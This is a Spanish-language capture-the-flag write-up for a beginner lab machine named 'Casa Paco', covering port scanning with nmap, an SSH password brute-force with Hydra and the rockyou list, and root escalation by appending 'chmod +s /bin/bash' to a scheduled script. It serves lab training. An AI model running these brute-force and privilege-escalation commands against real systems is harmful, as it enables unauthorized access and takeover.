Casa Paco

🔍 Dificultad: Principiante

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 192.168.1.60

para verificar la conectividad de red.

A continuación, se realiza el comando:

nmap -p- --open 192.168.1.60 --min-rate 5000 -n

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p22,80 -v 192.168.1.60

para obtener más información sobre ese puerto específicamente.

Miramos a ver que contiene el puerto 80 por si encontramos alguna información relevante pero hay que añadir el dominio casapaco.thl.

Revisando la página encontramos esto interesante.

Interceptamos con Burpsuite peticiones.

🚀 EXPLOTACIÓN

Dado que hemos identificado otra página, /llevar1.php, intentaremos ejecutar comandos en ella para determinar si proporciona más información que la página anterior.

Descubrimos el usuario pacogerente por lo que realizamos fuerza bruta con Hydra.

hydra -l pacogerente -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.60 

Iniciamos sesión con esas credenciales.

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar. No tenemos permisos SUDO.

Tenemos un archivo que se está ejecutando por lo que cambiamos el contenido para poder manipular y ser root.

echo 'chmod +s /bin/bash' >> /home/pacogerente/fabada.sh
/bin/bash -p

Ya somos root.

Te deseo mucho éxito en tu búsqueda de las flags! Recuerda prestar atención a cada detalle, examinar los archivos y servicios con detenimiento, y utilizar todas las herramientas disponibles para encontrarlas. La clave para el éxito está en la perseverancia y en no dejar ningún rincón sin explorar. ¡Adelante, hacker! 💻🔍🚀

Last updated

Was this helpful?